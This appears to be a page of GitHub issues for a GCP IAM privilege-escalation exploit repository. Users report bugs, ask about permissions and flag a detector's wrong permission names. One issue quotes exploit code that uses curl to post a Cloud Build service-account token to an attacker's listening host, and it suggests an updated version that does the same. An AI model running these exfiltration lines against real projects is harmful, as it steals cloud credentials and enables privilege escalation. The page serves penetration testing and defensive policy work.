rhinosecuritylabs / gcp-iam-privilege-escalation Goto Github PK

We can't get Cloud Build Service Account token by this python code.

issue python file

https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py

Becouse no longer unavailable /root/tokencache/gsutil_token_cache in my environment.

issue code

    if args.listening_host:
        command = f'import os;os.system("curl -d @/root/tokencache/gsutil_token_cache {args.listening_host}")'
    else:
        command = f'import os;os.system("curl -d @/root/tokencache/gsutil_token_cache {args.ip_port}")'

So I suggest Changeing build container and command to gcr.io/cloud-builders/gcloud and commands to get access_token.

suggest code

    if args.listening_host:
        command = f'import os;os.system("gcloud auth print-access-token > token.txt ;curl -d @token.txt {args.listening_host}")'
    else:
        command = f'import os;os.system("gcloud auth print-access-token > token.txt ;curl -d @token.txt {args.ip_port}")'

I will pull request for this issue.

What are the required permissions to use the enumerate_member_permissions.py script ?

It looks like you need at least:

• resourcemanager.projects.get to use projects.getAncestry
• resourcemanager.projects.getIamPolicy to use projects.getIamPolicy
• resourcemanager.folders.getIamPolicy to use folders().getIamPolicy
• resourcemanager.organizations.getIamPolicy to use organizations.getIamPolicy

How would you suggest going about creating a oauth2 token that many of these scripts ask for?

Thanks.

Thanks for the repo, it's very helpful as a defender putting together policies.

I think there are a couple of issues with the API keys route included in this tool and mentioned in the post.

My understanding is that API keys don't grant you access to any non-public resource, they just allow you to make API requests that are billed to a project and are identified as coming from a particular source application. ref https://cloud.google.com/docs/authentication#applications

Most Google Cloud APIs also support anonymous access to public data using API keys. However, API keys only identify the application, not the principal. When using API keys, the principal must be authenticated by other means.

I think any user that already has some permissions on a project already has more privileges than what is granted by an API key?

Separately the detector has the permission names wrong - serviceusage.apiKeys.{create,list} don't exist, it's apikeys.keys... instead.

EDIT: Removed :)

Hello,
Just to inform you that you made a small typo mistake in one of your exploit script :
res = service.projects().serviceAccounts().generateAccessToken(name=f'projects/-/serviceAccounts/{svc_acccount["email"]}', body=body).execute()

on line 38

Should be

res = service.projects().serviceAccounts().generateAccessToken(name=f'projects/-/serviceAccounts/{svc_account["email"]}', body=body).execute()

Nothing bad
Have a nice day